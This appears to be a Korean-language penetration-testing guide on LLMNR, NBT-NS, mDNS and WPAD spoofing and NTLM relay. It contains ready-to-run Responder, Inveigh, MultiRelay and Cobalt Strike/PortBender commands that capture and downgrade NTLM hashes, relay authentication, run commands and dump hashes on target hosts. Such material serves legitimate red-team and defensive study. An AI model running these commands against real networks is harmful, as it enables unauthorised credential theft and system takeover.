Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

네트워크 프로토콜

로컬 호스트 해상도 프로토콜

• LLMNR, NBT-NS 및 mDNS:

• Microsoft 및 다른 운영 체제는 DNS가 실패할 때 로컬 이름 해상도를 위해 LLMNR 및 NBT-NS를 사용합니다. 비슷하게, Apple 및 Linux 시스템은 mDNS를 사용합니다.

• 이러한 프로토콜은 UDP를 통해 인증되지 않은 브로드캐스트 방식으로 가로채고 스푸핑될 수 있습니다.

• Responder를 사용하여 이러한 프로토콜을 쿼리하는 호스트에 대한 위조된 응답을 보내어 서비스를 위장할 수 있습니다.

• Responder를 사용한 서비스 위장에 대한 자세한 정보는 여기에서 찾을 수 있습니다.

웹 프록시 자동 검색 프로토콜 (WPAD)

• WPAD는 브라우저가 프록시 설정을 자동으로 찾을 수 있게 합니다.

• DNS 또는 DHCP를 통해 검색이 용이하며, DNS가 실패하면 LLMNR 및 NBT-NS로 대체됩니다.

• Responder를 사용하여 WPAD 공격을 자동화하여 클라이언트를 악의적인 WPAD 서버로 유도할 수 있습니다.

프로토콜 독립성을 위한 Responder

• Responder는 LLMNR, NBT-NS 및 mDNS 쿼리를 독립적으로 응답하는 도구로, 주로 SMB 서비스를 대상으로 적응적으로 응답합니다.

• Kali Linux에 미리 설치되어 있으며, /etc/responder/Responder.conf에서 구성할 수 있습니다.

• Responder는 캡처된 해시를 화면에 표시하고 /usr/share/responder/logs 디렉토리에 저장합니다.

• IPv4 및 IPv6를 모두 지원합니다.

• Responder의 Windows 버전은 여기에서 사용할 수 있습니다.

Responder 실행

• 기본 설정으로 Responder 실행: responder -I <Interface>

• 더 공격적인 프로빙을 위한 실행 (부작용 가능): responder -I <Interface> -P -r -v

• NTLMv1 챌린지/응답을 캡처하여 쉽게 크래킹하기 위한 기술: responder -I <Interface> --lm --disable-ess

• WPAD 위장을 활성화하려면: responder -I <Interface> --wpad

• NetBIOS 요청을 공격자의 IP로 해결하고 인증 프록시를 설정할 수 있습니다: responder.py -I <interface> -Pv

Responder를 사용한 DHCP 독립성

• DHCP 응답을 스푸핑하여 피해자의 라우팅 정보를 영구적으로 독립시킬 수 있으며, ARP 스푸핑에 대한 은밀한 대안을 제공합니다.

• 대상 네트워크 구성에 대한 정확한 지식이 필요합니다.

• 공격 실행: ./Responder.py -I eth0 -Pdv

• 이 방법은 효과적으로 NTLMv1/2 해시를 캡처할 수 있지만, 네트워크 방해를 피하기 위해 주의 깊게 다뤄야 합니다.

Responder를 사용한 자격 캡처

• Responder는 상기 프로토콜을 사용하여 서비스를 위장하고 사용자가 위조된 서비스에 인증을 시도할 때 자격 증명(일반적으로 NTLMv2 챌린지/응답)을 캡처합니다.

• NetNTLMv1로 다운그레이드하거나 쉬운 자격 증명 크래킹을 위해 ESS를 비활성화하려는 시도를 할 수 있습니다.

이러한 기술을 적법하고 윤리적으로 사용하고 적절한 승인을 받아 네트워크 방해나 무단 접근을 피하는 것이 중요합니다.

Inveigh

Inveigh는 Windows 시스템용으로 설계된 펜 테스터 및 레드 팀을 위한 도구입니다. Responder와 유사한 기능을 제공하며 스푸핑 및 중간자 공격을 수행합니다. 이 도구는 PowerShell 스크립트에서 C# 이진 파일로 진화했으며, 주요 버전으로 Inveigh 및 InveighZero가 있습니다. 자세한 매개변수 및 지침은 위키에서 찾을 수 있습니다.

Inveigh는 PowerShell을 통해 작동할 수 있습니다:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

또는 C# 이진 파일로 실행됩니다:

Inveigh.exe

NTLM 릴레이 공격

이 공격은 SMB 인증 세션을 활용하여 대상 컴퓨터에 액세스하여 성공하면 시스템 쉘을 부여합니다. 주요 전제 조건은 다음과 같습니다:

• 인증하는 사용자는 중골 관리자 액세스 권한이 있어야 합니다.

• SMB 서명이 비활성화되어 있어야 합니다.

445 포트 포워딩 및 터널링

직접적인 네트워크 연결이 불가능한 시나리오에서는 포트 445의 트래픽을 전달하고 터널링해야 합니다. PortBender와 같은 도구는 포트 445 트래픽을 다른 포트로 리디렉션하는 데 도움이 되며, 이는 로컬 관리자 액세스가 드라이버 로딩에 사용 가능한 경우 필수적입니다.

Cobalt Strike에서 PortBender 설정 및 작동:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

NTLM 릴레이 공격을 위한 다른 도구

• Metasploit: 프록시, 로컬 및 원격 호스트 세부 정보로 설정합니다.

• smbrelayx: SMB 세션을 릴레이하고 명령을 실행하거나 백도어를 배포하는 Python 스크립트입니다.

• MultiRelay: 특정 사용자 또는 모든 사용자를 릴레이하고 명령을 실행하거나 해시를 덤프하는 Responder 스위트의 도구입니다.

각 도구는 필요한 경우 SOCKS 프록시를 통해 작동하도록 구성할 수 있어 간접적인 네트워크 액세스로도 공격을 수행할 수 있습니다.

MultiRelay 작동

MultiRelay는 /usr/share/responder/tools 디렉토리에서 실행되며 특정 IP 또는 사용자를 대상으로 합니다.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

NTLM Relay 공격을 수행하기 위한 포괄적인 세트를 형성하는 이러한 도구와 기술들이 있습니다.

NTLM 로그인 강제

Windows에서 일부 특권 계정을 임의의 기기에 인증하도록 강제할 수 있을 수 있습니다. 다음 페이지를 읽어보고 방법을 배우세요:

참고 자료

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html